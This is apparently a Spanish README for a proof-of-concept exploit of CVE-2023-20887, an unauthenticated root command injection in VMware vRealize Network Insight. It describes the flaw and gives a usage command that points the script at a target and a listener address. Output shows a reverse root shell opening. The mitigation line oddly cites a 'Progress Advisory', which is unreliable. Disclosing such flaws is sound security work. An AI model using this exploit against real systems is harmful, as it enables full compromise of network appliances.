
VMWare vRealize Network Insight RCE preautenticado (CVE-2023-20887)
POC para CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) RCE no autenticado
Se puede encontrar un análisis de causa raíz de la vulnerabilidad en mi blog: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) es vulnerable a inyección de comandos cuando acepta entradas del usuario a través de la interfaz RPC de Apache Thrift. Esta vulnerabilidad permite a un atacante remoto no autenticado ejecutar comandos arbitrarios en el sistema operativo subyacente como el usuario root. La interfaz RPC está protegida por un proxy inverso que puede ser omitido. VMware ha evaluado la gravedad de este problema en el rango de gravedad Crítico con una puntuación base máxima de CVSSv3 de 9.8. un actor malicioso puede obtener ejecución remota de código en el contexto de 'root' en el dispositivo. Las versiones de VMWare 6.x son vulnerables.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Actualice a la última versión o mitigue siguiendo las instrucciones del Progress Advisory
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables por el mal uso del software. Úselo de manera responsable.